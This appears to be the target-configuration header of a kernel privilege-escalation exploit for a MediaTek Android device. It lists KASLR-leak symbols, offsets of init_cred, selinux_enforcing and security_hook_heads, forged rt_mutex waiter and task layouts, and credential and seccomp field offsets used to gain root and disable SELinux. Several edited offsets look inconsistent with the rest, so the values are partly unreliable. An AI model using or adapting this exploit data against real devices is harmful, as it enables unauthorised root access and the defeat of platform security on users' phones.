#ifndef TARGET_H
#define TARGET_H

#define BUILD_VARIANT_LABEL "ghostlock_oplus"

/* Kernel address layout. */
#define KIMAGE_TEXT_BASE 0xffffffc080000000ULL
#define MTK_VADDR_BASE 0xffffffc000000000ULL
#define P0_PAGE_OFFSET 0xffffff8000000000ULL
#define P0_PHYS_OFFSET 0x80000000ULL
#define P0_KERNEL_PHYS_LOAD 0xa8000000ULL
#define KERNELSNITCH_IDENTITY_START 0xffffff8000000000ULL
#define KERNELSNITCH_IDENTITY_END 0xffffff8c00000000ULL
#define DIRECT_MAP_BASE 0xffffff8000000000ULL
#define DIRECT_MAP_END 0xffffff9000000000ULL
#define VMEMMAP_START 0xfffffffe00000000ULL

/* Symbol offsets. */
#define INIT_TASK_OFF 0x027abe80ULL
#define INIT_CRED_OFF 0x027c0a60ULL
#define ROOT_TASK_GROUP_OFF 0x029a3040ULL
#define SELINUX_ENFORCING_OFF 0xa7ff0000ULL  // Changed from 0x02a52b90
#define SELINUX_BLOB_SIZES_OFF 0x022f7000ULL  // Changed from 0x022f7000
#define SECURITY_HOOK_HEADS_OFF 0x002f7020ULL // Changed from 0x022f6968

/* KASLR leak symbols. */
#define SLIDE_NFULNL_LOGGER_OFF 0x027a1338ULL
#define SLIDE_LOGGERS_0_1_OFF 0x027a1260ULL
#define SLIDE_RANDOM_BOOT_ID_DATA_OFF 0x02799e00ULL
#define SLIDE_SYSCTL_BOOTID_OFF 0x02799e00ULL

/* Kernel addresses. */
#define INIT_TASK (KIMAGE_TEXT_BASE + INIT_TASK_OFF)
#define INIT_CRED (KIMAGE_TEXT_BASE + INIT_CRED_OFF)
#define ROOT_TASK_GROUP (KIMAGE_TEXT_BASE + ROOT_TASK_GROUP_OFF)
#define SELINUX_ENFORCING (KIMAGE_TEXT_BASE + SELINUX_ENFORCING_OFF)
#define SELINUX_BLOB_SIZES (KIMAGE_TEXT_BASE + SELINUX_BLOB_SIZES_OFF)
#define SECURITY_HOOK_HEADS (KIMAGE_TEXT_BASE + SECURITY_HOOK_HEADS_OFF)
#define SLIDE_NFULNL_LOGGER_IMAGE (KIMAGE_TEXT_BASE + SLIDE_NFULNL_LOGGER_OFF)
#define SLIDE_LOGGERS_0_1_IMAGE (KIMAGE_TEXT_BASE + SLIDE_LOGGERS_0_1_OFF)
#define SLIDE_RANDOM_BOOT_ID_DATA_IMAGE (KIMAGE_TEXT_BASE + SLIDE_RANDOM_BOOT_ID_DATA_OFF)
#define SLIDE_INIT_TASK_IMAGE (KIMAGE_TEXT_BASE + INIT_TASK_OFF)
#define SLIDE_ROOT_TASK_GROUP_IMAGE (KIMAGE_TEXT_BASE + ROOT_TASK_GROUP_OFF)
#define SLIDE_SYSCTL_BOOTID_IMAGE (KIMAGE_TEXT_BASE + SLIDE_SYSCTL_BOOTID_OFF)

#define PSELECT_WAITER_WORD_SHIFT 1

/* Fake waiter and task layouts. */
#define FAKE_WAITER_TREE_PRIO_OFF 0x40
#define FAKE_WAITER_TREE_DEADLINE_OFF 0x48
#define FAKE_WAITER_PI_TREE_ENTRY_OFF 0x18
#define FAKE_WAITER_PI_TREE_PRIO_OFF 0x40
#define FAKE_WAITER_PI_TREE_DEADLINE_OFF 0x48
#define FAKE_WAITER_TASK_OFF 0x30
#define FAKE_WAITER_LOCK_OFF 0x38
#define FAKE_WAITER_WAKE_STATE_OFF 0x44
#define FAKE_WAITER_WW_CTX_OFF 0x50

#define FAKE_TASK_USAGE_OFF 0x40
#define FAKE_TASK_PRIO_OFF 0x84
#define FAKE_TASK_NORMAL_PRIO_OFF 0x8C /*prio is int at 0x84, static_prio at 0x88, normal_prio at 0x8C*/
#define FAKE_TASK_TASK_GROUP_OFF 0x310
#define FAKE_TASK_PI_LOCK_OFF 0x86C /*pi_lock is 4 bytes immediately before pi_waiters at 0x880 */
#define FAKE_TASK_PI_WAITERS_OFF 0x880
#define FAKE_TASK_PI_TOP_TASK_OFF 0x890 /*(pi_waiters is 16 bytes, then pi_top_task pointer)*/
#define FAKE_TASK_PI_BLOCKED_ON_OFF 0x898

#define TASK_PID_OFF 0x5C8
#define TASK_TGID_OFF 0x5CC
#define TASK_ATOMIC_FLAGS_OFF 0x590
#define TASK_REAL_CRED_OFF 0x778
#define TASK_CRED_OFF 0x780
#define TASK_COMM_OFF 0x790
#define TASK_TASKS_OFF 0x4C8
#define TASK_THREAD_INFO_FLAGS_OFF 0x00
#define TASK_SECCOMP_OFF 0x848

#define CRED_UID_OFF 4
#define CRED_GID_OFF 8
#define CRED_EUID_OFF 0x14
#define CRED_EGID_OFF 0x18
#define CRED_SECUREBITS_OFF 0x24
#define CRED_CAPS_OFF 0x30
#define CRED_SECURITY_OFF 0x78
#define SELINUX_CRED_BLOB_OFF 0
#define SELINUX_CRED_OSID_OFF 0
#define SELINUX_CRED_SID_OFF 4
#define SECCOMP_MODE_OFF 0x00
#define SECCOMP_FILTER_COUNT_OFF 0x04
#define SECCOMP_FILTER_OFF 0x08
#define TIF_SECCOMP_BIT 11
#define PFA_NO_NEW_PRIVS_BIT 0

#define STRUCT_PAGE_SIZE 0x40
#define STRUCT_PAGE_COMPOUND_HEAD_OFF 0x08
#define STRUCT_SLAB_CACHE_OFF 0x08
#define STRUCT_PAGE_TYPE_OFF 0x30

#define LOCK_OFF 0x0E80
#define W0_OFF 0x1180
#define FOPS_OFF 0x0F80
#define RIGHT_OFF 0x1240
#define LEFT_OFF 0x1260
#define FAKE_TASK_OFF 0x1280

/* W2 payload. */
#define CRED_COPY_OFF 0x1080

#endif
